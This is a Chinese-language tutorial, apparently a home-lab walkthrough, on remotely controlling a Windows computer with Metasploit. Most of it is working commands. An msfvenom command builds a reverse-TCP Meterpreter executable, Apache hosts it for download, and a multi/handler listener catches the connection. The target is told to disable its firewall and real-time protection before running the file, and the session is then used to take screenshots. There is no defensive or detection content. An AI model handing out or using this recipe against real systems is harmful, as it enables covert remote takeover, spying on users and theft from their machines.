利用Msfvenom对Windows进行远程控制

一、准备工作

先在kali安装Apache2，下载代码如下

sudo apt install apache2

 启动Apache2服务

service apache2 start

 在kali浏览器中输入你的kali IP，得到该页面说明启动成功

二、开始

1.msf远控生成

（1）在kali运行msf生成exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的kali_ip LPORT=5000 -f exe -o /root/payload.exe

 这里刚开始的LPORT设为5000，但是在后文会提到一些其他情况，后文再说

（2） 将有效载荷文件复制到 Apache 的根目录

sudo cp /root/payload.exe /var/www/html/

可以发现已经放进根目录了

（3） 设置 Metasploit 监听器

启动 Metasploit 控制台，召唤出来一个南瓜头（也召唤出过别的）

msfconsole

 使用多重处理程序

use exploit/multi/handler

设置有效载荷

set payload windows/meterpreter/reverse_tcp 

设置 LHOST 和 LPORT

set LHOST + 你的kali IP

set LPORT 5000 

 这里还是用5000，看一下等下发生了啥

启动监听器

exploit

 会发现

[-]处理程序无法绑定到 xxx.xxx.xxx.129：5000：- -

[-]处理程序无法绑定到 0.0.0.0：5000：- -

[-]漏洞利用失败 [bad-config]： Rex：：BindFailed 地址已在使用中或不可用： （0.0.0.0：5000）。

[*]利用已完成，但未创建会话。

 后面想了想可能是5000端口被占用或者啥的，反正用不了，这时候可以改一下端口

改成5001

再次exploit

 成功了（如果5000端口没出问题就不用考虑这一步）

2.在物理机上下载刚才做好的payload.exe

打开浏览器，输入

http://你的Kali IP/payload.exe

记得要把防火墙和实时保护给关了，不然不让安装

安装后打开 

三、远控实现以及命令 

回到kali，搞点操作

ipconfig

 可以拿到物理机的ip地址

screenshot

 可以完成物理机实时的截图以及图片保存的地址

 当然还有更多其他指令，有兴趣的可以去搜搜然后来试试效果

总结

本文介绍了如何利用Msfvenom对Windows进行远程控制，期间出现端口出问题的情况也得到有效解决，谢谢观看